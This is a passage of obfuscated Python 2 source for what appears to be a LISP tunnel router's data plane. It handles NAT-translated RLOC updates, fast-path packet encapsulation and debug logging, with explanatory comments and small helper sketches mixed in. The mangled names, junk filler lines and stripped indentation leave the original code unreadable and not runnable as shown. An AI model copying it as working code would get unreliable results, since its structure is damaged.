if 5 - 5: o0oOOo0O0Ooo * ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
return
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
lisp . lisp_glean_mappings . append ( oO0Oo )
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
def iiii ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "RTR" ) )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
def oo0o00O ( mc , parms ) :
o00O0OoO , Oo0OoO00oOO0o , i1I , OoOO = parms
if 53 - 53: Oo0Ooo
iI1Iii = "{}:{}" . format ( Oo0OoO00oOO0o . print_address_no_iid ( ) , i1I )
Ii1iIiII1ii1 = lisp . green ( mc . print_eid_tuple ( ) , False )
oO00OOoO00 = "Changed '{}' translated address:port to {} for EID {}, {} {}" . format ( OoOO , lisp . red ( iI1Iii , False ) , Ii1iIiII1ii1 , "{}" , "{}" )
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
for i1I1iI1iIi111i in mc . rloc_set :
if ( i1I1iI1iIi111i . rle ) :
for iiIi1IIi1I in i1I1iI1iIi111i . rle . rle_nodes :
if ( iiIi1IIi1I . rloc_name != OoOO ) : continue
iiIi1IIi1I . store_translated_rloc ( Oo0OoO00oOO0o , i1I )
o0OoOO000ooO0 = iiIi1IIi1I . address . print_address_no_iid ( ) + ":" + str ( iiIi1IIi1I . translated_port )
if 56 - 56: iII111i
lisp . lprint ( oO00OOoO00 . format ( "RLE" , o0OoOO000ooO0 ) )
if 86 - 86: II111iiii % I1Ii111
if 15 - 15: i1IIi * I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if ( i1I1iI1iIi111i . rloc_name != OoOO ) : continue
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
o0OoOO000ooO0 = i1I1iI1iIi111i . rloc . print_address_no_iid ( ) + ":" + str ( i1I1iI1iIi111i . translated_port )
if 62 - 62: OOooOOo + O0
if ( o0OoOO000ooO0 in lisp . lisp_crypto_keys_by_rloc_encap ) :
oO0OOOO0 = lisp . lisp_crypto_keys_by_rloc_encap [ o0OoOO000ooO0 ]
lisp . lisp_crypto_keys_by_rloc_encap [ iI1Iii ] = oO0OOOO0
if 26 - 26: Ii1I
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
if 47 - 47: iII111i - Ii1I . II111iiii + OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
i1I1iI1iIi111i . delete_from_rloc_probe_list ( mc . eid , mc . group )
i1I1iI1iIi111i . store_translated_rloc ( Oo0OoO00oOO0o , i1I )
i1I1iI1iIi111i . add_to_rloc_probe_list ( mc . eid , mc . group )
lisp . lprint ( oO00OOoO00 . format ( "RLOC" , o0OoOO000ooO0 ) )
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
if ( lisp . lisp_rloc_probing ) :
o00oO0oo0OO = None if ( mc . group . is_null ( ) ) else mc . eid
O0O0OOOOoo = mc . eid if ( mc . group . is_null ( ) ) else mc . group
lisp . lisp_send_map_request ( o00O0OoO , 0 , o00oO0oo0OO , O0O0OOOOoo , i1I1iI1iIi111i )
if 74 - 74: I1ii11iIi11i + II111iiii / OoO0O00
if 100 - 100: OoOoOO00 * iIii1I11I1II1
if 86 - 86: OoO0O00 * OOooOOo . iII111i
if 32 - 32: o0oOOo0O0Ooo . IiII * I11i
if 93 - 93: o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
lisp . lisp_write_ipc_map_cache ( True , mc )
return ( True , parms )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
def ii1111iII ( mc , parms ) :
if 32 - 32: i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if ( mc . group . is_null ( ) ) : return ( oo0o00O ( mc , parms ) )
if 97 - 97: O0 + OoOoOO00
if ( mc . source_cache == None ) : return ( True , parms )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
mc . source_cache . walk_cache ( oo0o00O , parms )
return ( True , parms )
#
# Walk the entire map-cache and update any RLOCs registered behind a NAT for
# 'hostname' to the newly learned translated rloc:port.
#
def OooOo0ooo ( sockets , hostname , rloc , port ) :
lisp . lisp_map_cache . walk_cache ( ii1111iII ,
[ sockets , rloc , port , hostname ] )
return
#
# Fast-path debug logger: when data-plane logging is enabled, hex-dump the IP
# header (and, for Encap/Decap, the UDP and LISP headers) of the packet.
#
def I1II1 ( sred , packet ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 86 - 86: iIii1I11I1II1 / OoOoOO00 . II111iiii
if ( sred in [ "Send" , "Receive" ] ) :
II1i111Ii1i = binascii . hexlify ( packet [ 0 : 20 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}" . format ( sred , II1i111Ii1i [ 0 : 8 ] , II1i111Ii1i [ 8 : 16 ] ,
II1i111Ii1i [ 16 : 24 ] , II1i111Ii1i [ 24 : 32 ] , II1i111Ii1i [ 32 : 40 ] ) )
elif ( sred in [ "Encap" , "Decap" ] ) :
II1i111Ii1i = binascii . hexlify ( packet [ 0 : 36 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}, udp {} {}, lisp {} {}" . format ( sred , II1i111Ii1i [ 0 : 8 ] , II1i111Ii1i [ 8 : 16 ] , II1i111Ii1i [ 16 : 24 ] , II1i111Ii1i [ 24 : 32 ] , II1i111Ii1i [ 32 : 40 ] ,
# I1IiiI
II1i111Ii1i [ 40 : 48 ] , II1i111Ii1i [ 48 : 56 ] , II1i111Ii1i [ 56 : 64 ] , II1i111Ii1i [ 64 : 72 ] ) )
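#
# A minimal, stand-alone sketch (stdlib only; the helper name is hypothetical
# and not part of the lispers.net API) of the same technique the fast-path
# logger above uses: hex-dump the first 20 bytes of an IP header in 4-byte
# groups for a one-line log message.
#
def _example_dump_ip_header(packet_bytes):
    import binascii
    hexstr = binascii.hexlify(packet_bytes[0:20]).decode()
    groups = [hexstr[i:i + 8] for i in range(0, len(hexstr), 8)]
    return "ip " + " ".join(groups)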
#
# Log whether the fast-path map-cache lookup for 'dest' was a hit or a miss.
#
def o0OOOoO0 ( dest , mc ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 73 - 73: I11i % i11iIiiIii - I1IiiI
Ii1iI111II1I1 = "miss" if mc == None else "hit!"
lisp . lprint ( "Fast-Lookup {} {}" . format ( dest . print_address ( ) , Ii1iI111II1I1 ) )
#
# Optional latency instrumentation: the first call (ts=None) returns a start
# timestamp, the second call logs the elapsed time in microseconds.
#
def OO0000o ( ts , msg ) :
global I1I11I1I1I
if 42 - 42: Oo0Ooo
if ( I1I11I1I1I == False ) : return ( None )
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if ( ts == None ) : return ( time . time ( ) )
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
ts = ( time . time ( ) - ts ) * 1000000
lisp . lprint ( "{}-Latency: {} usecs" . format ( msg , round ( ts , 1 ) ) , "force" )
return ( None )
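#
# Hedged sketch (stdlib only, hypothetical name) of the start/stop latency
# pattern used above: call once with ts=None to get a start timestamp, then
# call again with that timestamp to log the elapsed microseconds.
#
def _example_latency(ts=None, msg="Fast"):
    import time
    if ts is None:
        return time.time()                       # start of the measured region
    usecs = (time.time() - ts) * 1000000
    print("{}-Latency: {} usecs".format(msg, round(usecs, 1)))
    return None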
#
# Convert a 4-byte network-order address string into a host integer.
#
def Oo0o0O00 ( a ) :
ii1 = ord ( a [ 0 ] ) << 24 | ord ( a [ 1 ] ) << 16 | ord ( a [ 2 ] ) << 8 | ord ( a [ 3 ] )
return ( ii1 )
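#
# The helper above packs a 4-byte network-order address string into a host
# integer by shifting each byte; struct gives the same result in one call.
# A sketch only -- the name is illustrative, not part of the original code.
#
def _example_bytes_to_ipv4_int(four_bytes):
    import struct
    return struct.unpack("!I", four_bytes)[0]    # network byte order -> int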
#
# Module-level scratch lisp_address() objects reused by the IPv4 fast path
# below for the inner source and destination EIDs.
#
iI1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
IiI = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 21 - 21: OoO0O00 + I1IiiI % I1IiiI
#
# RTR IPv4 fast path. For a UDP packet: leave port-4342 control traffic to
# the normal path, decapsulate a port-4341 LISP data packet, look up the
# inner destination in the map-cache (honoring gleaning and the secondary
# instance-id), then either forward natively or prepend a fresh outer
# IPv4/UDP/LISP header and send it on the raw socket. Returns True when the
# packet was fully handled here.
#
def oO0o0oooO0oO ( packet ) :
global lisp_map_cache , o0oOoO00o
if 19 - 19: i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
Iii1iiIi1II = OO0000o ( None , "Fast" )
if 60 - 60: I1IiiI - oO0o * I11i % II111iiii
if 62 - 62: iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
iii11I = 0
I1Iii1 = None
if ( packet [ 9 ] == '\x11' ) :
if ( packet [ 20 : 22 ] == '\x10\xf6' ) : return ( False )
if ( packet [ 22 : 24 ] == '\x10\xf6' ) : return ( False )
if 30 - 30: OoooooooOO - OoOoOO00
if ( packet [ 20 : 22 ] == '\x10\xf5' or packet [ 22 : 24 ] == '\x10\xf5' ) :
I1Iii1 = packet [ 12 : 16 ]
iii11I = packet [ 32 : 35 ]
iii11I = ord ( iii11I [ 0 ] ) << 16 | ord ( iii11I [ 1 ] ) << 8 | ord ( iii11I [ 2 ] )
if ( iii11I == 0xffffff ) : return ( False )
I1II1 ( "Decap" , packet )
packet = packet [ 36 : : ]
if 75 - 75: iIii1I11I1II1 - Ii1I . Oo0Ooo % i11iIiiIii % I11i
if 55 - 55: iII111i . II111iiii % OoO0O00 * iII111i + ooOoO0o + Ii1I
if 24 - 24: Oo0Ooo - oO0o % iIii1I11I1II1 . i1IIi / O0
I1II1 ( "Receive" , packet )
if 36 - 36: I1IiiI - I11i
if 29 - 29: ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
I1ii11 = Oo0o0O00 ( packet [ 16 : 20 ] )
IiI . instance_id = iii11I
IiI . address = I1ii11
if 74 - 74: Oo0Ooo - o0oOOo0O0Ooo . i1IIi
if 43 - 43: iII111i / I1IiiI
if 58 - 58: I1IiiI + i11iIiiIii % Ii1I . OoOoOO00
if 13 - 13: i11iIiiIii + i1IIi * iIii1I11I1II1 % OoooooooOO - II111iiii * OOooOOo
if ( ( I1ii11 & 0xe0000000 ) == 0xe0000000 ) : return ( False )
if 26 - 26: OoooooooOO * I1IiiI + OOooOOo
if 24 - 24: i11iIiiIii % iIii1I11I1II1 + OOooOOo / i11iIiiIii
if 70 - 70: OoO0O00 * O0 . I11i + I1IiiI . IiII
if 14 - 14: iIii1I11I1II1 % iIii1I11I1II1 * i11iIiiIii - OoO0O00 - I11i
I1ii11 = IiI
o00oo0 = lisp . lisp_map_cache . lookup_cache ( I1ii11 , False )
o0OOOoO0 ( I1ii11 , o00oo0 )
if ( o00oo0 == None ) : return ( False )
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
if 27 - 27: O0
if ( I1Iii1 != None ) :
OOO0oOOoo = Oo0o0O00 ( packet [ 12 : 16 ] )
iI1 . instance_id = iii11I
iI1 . address = OOO0oOOoo
oOOO00o000o = lisp . lisp_map_cache . lookup_cache ( iI1 , False )
if ( oOOO00o000o == None ) :
iIi11i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( iI1 , None ,
None )
if ( iIi11i1 ) : return ( False )
elif ( oOOO00o000o . gleaned ) :
I1Iii1 = Oo0o0O00 ( I1Iii1 )
if ( oOOO00o000o . rloc_set [ 0 ] . rloc . address != I1Iii1 ) : return ( False )
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if 39 - 39: I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
if 96 - 96: OoOoOO00
o00oo0 . add_recent_source ( iI1 )
if 29 - 29: I1ii11iIi11i / i1IIi . I1IiiI - OoOoOO00 - OoOoOO00 - Ii1I
if 20 - 20: i1IIi % OoO0O00 . I1IiiI / IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if ( o00oo0 . action == lisp . LISP_NATIVE_FORWARD_ACTION and
o00oo0 . eid . instance_id == 0 ) :
I1ii11 . instance_id = lisp . lisp_default_secondary_iid
o00oo0 = lisp . lisp_map_cache . lookup_cache ( I1ii11 , False )
o0OOOoO0 ( I1ii11 , o00oo0 )
if ( o00oo0 == None ) : return ( False )
if ( o00oo0 . action != lisp . LISP_NATIVE_FORWARD_ACTION ) :
if ( o00oo0 . best_rloc_set == [ ] ) : return ( False )
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
I1ii11 = o00oo0 . best_rloc_set [ 0 ]
if ( I1ii11 . state != lisp . LISP_RLOC_UP_STATE ) : return ( False )
if 45 - 45: I1Ii111
iii11I = o00oo0 . eid . instance_id
i1I = I1ii11 . translated_port
oO = I1ii11 . stats
I1ii11 = I1ii11 . rloc
IIi1iiii1iI = I1ii11 . address
I1Iii1 = lisp . lisp_myrlocs [ 0 ] . address
if 25 - 25: I1ii11iIi11i + O0
if 28 - 28: OoooooooOO
if 89 - 89: iII111i - ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 49 - 49: Oo0Ooo - I1IiiI / IiII / O0 % o0oOOo0O0Ooo * Ii1I
OOo = '\x45\x00'
O0II11iI111i1 = len ( packet ) + 20 + 8 + 8
OOo += chr ( ( O0II11iI111i1 >> 8 ) & 0xff ) + chr ( O0II11iI111i1 & 0xff )
OOo += '\xff\xff\x40\x00\x10\x11\x00\x00'
OOo += chr ( ( I1Iii1 >> 24 ) & 0xff )
OOo += chr ( ( I1Iii1 >> 16 ) & 0xff )
OOo += chr ( ( I1Iii1 >> 8 ) & 0xff )
OOo += chr ( I1Iii1 & 0xff )
OOo += chr ( ( IIi1iiii1iI >> 24 ) & 0xff )
OOo += chr ( ( IIi1iiii1iI >> 16 ) & 0xff )
OOo += chr ( ( IIi1iiii1iI >> 8 ) & 0xff )
OOo += chr ( IIi1iiii1iI & 0xff )
OOo = lisp . lisp_ip_checksum ( OOo )
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
O0O0Ooooo000 = O0II11iI111i1 - 20
o000oOoo0o000 = '\xff\x00' if ( i1I == 4341 ) else '\x10\xf5'
o000oOoo0o000 += chr ( ( i1I >> 8 ) & 0xff ) + chr ( i1I & 0xff )
o000oOoo0o000 += chr ( ( O0O0Ooooo000 >> 8 ) & 0xff ) + chr ( O0O0Ooooo000 & 0xff ) + '\x00\x00'
if 40 - 40: i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - I11i . i1IIi
o000oOoo0o000 += '\x08\xdf\xdf\xdf'
o000oOoo0o000 += chr ( ( iii11I >> 16 ) & 0xff )
o000oOoo0o000 += chr ( ( iii11I >> 8 ) & 0xff )
o000oOoo0o000 += chr ( iii11I & 0xff )
o000oOoo0o000 += '\x00'
if 99 - 99: O0 * I11i
if 64 - 64: II111iiii + O0 / iIii1I11I1II1 / Oo0Ooo . ooOoO0o % IiII
if 50 - 50: iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
packet = OOo + o000oOoo0o000 + packet
I1II1 ( "Encap" , packet )
else :
O0II11iI111i1 = len ( packet )
oO = o00oo0 . stats
I1II1 ( "Send" , packet )
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
o00oo0 . last_refresh_time = time . time ( )
oO . increment ( O0II11iI111i1 )
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
I1ii11 = I1ii11 . print_address_no_iid ( )
o0oOoO00o . sendto ( packet , ( I1ii11 , 0 ) )
if 67 - 67: I1IiiI
OO0000o ( Iii1iiIi1II , "Fast" )
return ( True )
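#
# Hedged sketch (stdlib only, illustrative names) of what the fast path above
# builds by hand with chr(): a 20-byte outer IPv4 header for the encapsulated
# copy, with the one's-complement header checksum filled in. Field values
# here are simplified and are not meant to match the production header
# byte-for-byte.
#
def _example_outer_ipv4_header(src_int, dst_int, payload_len):
    import struct
    total_len = payload_len + 20 + 8 + 8        # payload + IPv4 + UDP + LISP
    hdr = struct.pack("!BBHHHBBH", 0x45, 0, total_len, 0, 0x4000, 0xff, 17, 0)
    hdr += struct.pack("!II", src_int, dst_int)
    words = struct.unpack("!10H", hdr)          # checksum over ten 16-bit words
    csum = sum(words)
    csum = (csum & 0xffff) + (csum >> 16)
    csum = (csum & 0xffff) + (csum >> 16)
    csum = ~csum & 0xffff
    return hdr[0:10] + struct.pack("!H", csum) + hdr[12:20]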
#
# Main RTR data-plane entry point. Handle RLOC-probes and Info-Requests sent
# to the data port, reassemble and decapsulate LISP data packets, glean EIDs
# and multicast groups when configured, look up the map-cache, and then
# natively forward, re-encapsulate to the selected RLOC, or replicate to the
# entry's RLE nodes.
#
def Ii1ii111i1 ( lisp_packet , thread_name ) :
global Oo0o , i1i1i1I , oOoo000
global o0oOoO00o , i1
global OOO0o0o
global iIiiI1
global oo0Ooo0
if 87 - 87: OoooooooOO - o0oOOo0O0Ooo / IiII . i11iIiiIii * OoooooooOO
Iii1iiIi1II = OO0000o ( None , "RTR" )
if 84 - 84: OoOoOO00 / I11i * iII111i / oO0o - i11iIiiIii . Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if ( oo0Ooo0 ) :
if ( oO0o0oooO0oO ( lisp_packet . packet ) ) : return
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
if 38 - 38: OoOoOO00 / iII111i % Oo0Ooo
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
O0O0oOOo0O = lisp_packet
II11 = O0O0oOOo0O . is_lisp_packet ( O0O0oOOo0O . packet )
if 68 - 68: iII111i * OoooooooOO * iIii1I11I1II1 . II111iiii
if 81 - 81: OOooOOo / O0 + I11i + Ii1I / I1IiiI
if 27 - 27: OoOoOO00 * IiII
if 59 - 59: IiII . IiII - II111iiii + IiII . i1IIi . OoO0O00
if ( II11 == False ) :
Oo00OOo = O0O0oOOo0O . packet
o0o0O , oOO0OooOo , i1I , I1Ii = lisp . lisp_is_rloc_probe ( Oo00OOo , - 1 )
if ( Oo00OOo != o0o0O ) :
if ( oOO0OooOo == None ) : return
lisp . lisp_parse_packet ( Oo0o , o0o0O , oOO0OooOo , i1I , I1Ii )
return
O0O0oOOo0O . packet = lisp . lisp_reassemble ( O0O0oOOo0O . packet )
if ( O0O0oOOo0O . packet == None ) : return
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if ( lisp . lisp_flow_logging ) : O0O0oOOo0O = copy . deepcopy ( O0O0oOOo0O )
if ( II11 ) :
if ( O0O0oOOo0O . decode ( True , None , lisp . lisp_decap_stats ) == None ) : return
O0O0oOOo0O . print_packet ( "Receive-({})" . format ( thread_name ) , True )
O0O0oOOo0O . strip_outer_headers ( )
else :
if ( O0O0oOOo0O . decode ( False , None , None ) == None ) : return
O0O0oOOo0O . print_packet ( "Receive-({})" . format ( thread_name ) , False )
if ( II11 and O0O0oOOo0O . lisp_header . get_instance_id ( ) == 0xffffff ) :
i11i11 = lisp . lisp_control_header ( )
i11i11 . decode ( O0O0oOOo0O . packet )
if ( i11i11 . is_info_request ( ) ) :
OoOoO00O0 = lisp . lisp_info ( )
OoOoO00O0 . decode ( O0O0oOOo0O . packet )
OoOoO00O0 . print_info ( )
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
O00oo0ooO = OoOoO00O0 . hostname if ( OoOoO00O0 . hostname != None ) else ""
iiIii1ii = O0O0oOOo0O . outer_source
II1i111Ii1i = O0O0oOOo0O . udp_sport
if ( lisp . lisp_store_nat_info ( O00oo0ooO , iiIii1ii , II1i111Ii1i ) ) :
OooOo0ooo ( Oo0o , O00oo0ooO , iiIii1ii , II1i111Ii1i )
if 33 - 33: I1Ii111
else :
oOO0OooOo = O0O0oOOo0O . outer_source . print_address_no_iid ( )
I1Ii = O0O0oOOo0O . outer_ttl
O0O0oOOo0O = O0O0oOOo0O . packet
if ( lisp . lisp_is_rloc_probe_request ( O0O0oOOo0O [ 28 ] ) == False and
lisp . lisp_is_rloc_probe_reply ( O0O0oOOo0O [ 28 ] ) == False ) : I1Ii = - 1
O0O0oOOo0O = O0O0oOOo0O [ 28 : : ]
lisp . lisp_parse_packet ( Oo0o , O0O0oOOo0O , oOO0OooOo , 0 , I1Ii )
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
return
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
if 68 - 68: oO0o - I1ii11iIi11i % O0 % I1Ii111
if 11 - 11: O0 / OoO0O00 % OOooOOo + o0oOOo0O0Ooo + iIii1I11I1II1
if 40 - 40: ooOoO0o - OOooOOo . Ii1I * Oo0Ooo % I1Ii111
if ( II11 ) :
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( O0O0oOOo0O . packet ) )
if 56 - 56: i11iIiiIii . o0oOOo0O0Ooo - I1IiiI * I11i
if 91 - 91: oO0o + OoooooooOO - i1IIi
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
iiii1I1 = False
if ( O0O0oOOo0O . inner_dest . is_mac ( ) ) :
O0O0oOOo0O . packet = lisp . lisp_mac_input ( O0O0oOOo0O . packet )
if ( O0O0oOOo0O . packet == None ) : return
O0O0oOOo0O . encap_port = lisp . LISP_VXLAN_DATA_PORT
elif ( O0O0oOOo0O . inner_version == 4 ) :
iiii1I1 , O0O0oOOo0O . packet = lisp . lisp_ipv4_input ( O0O0oOOo0O . packet )
if ( O0O0oOOo0O . packet == None ) : return
O0O0oOOo0O . inner_ttl = O0O0oOOo0O . outer_ttl
elif ( O0O0oOOo0O . inner_version == 6 ) :
O0O0oOOo0O . packet = lisp . lisp_ipv6_input ( O0O0oOOo0O )
if ( O0O0oOOo0O . packet == None ) : return
O0O0oOOo0O . inner_ttl = O0O0oOOo0O . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 14 - 14: OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
if ( O0O0oOOo0O . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( O0O0oOOo0O , ed = "decap" ) == False ) : return
O0O0oOOo0O . outer_source . afi = lisp . LISP_AFI_NONE
O0O0oOOo0O . outer_dest . afi = lisp . LISP_AFI_NONE
iIi11i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( O0O0oOOo0O . inner_source , None ,
O0O0oOOo0O . outer_source )
if ( iIi11i1 ) :
o00O = O0O0oOOo0O . packet if ( iiii1I1 ) else None
lisp . lisp_glean_map_cache ( O0O0oOOo0O . inner_source , O0O0oOOo0O . outer_source ,
O0O0oOOo0O . udp_sport , o00O )
if ( iiii1I1 ) : return
O0O0OOOOoo = O0O0oOOo0O . inner_dest
if ( O0O0OOOOoo . is_multicast_address ( ) ) :
if ( O0O0OOOOoo . is_link_local_multicast ( ) ) :
ooO000O = lisp . green ( O0O0OOOOoo . print_address ( ) , False )
lisp . dprint ( "Drop link-local multicast EID {}" . format ( ooO000O ) )
return
if 53 - 53: o0oOOo0O0Ooo . iII111i / Ii1I
I11iiIi1i1 = False
oO00oo0o00o0o , IiIIIIIi , i1IiiI1iIi = lisp . lisp_allow_gleaning ( O0O0oOOo0O . inner_source , O0O0OOOOoo , None )
else :
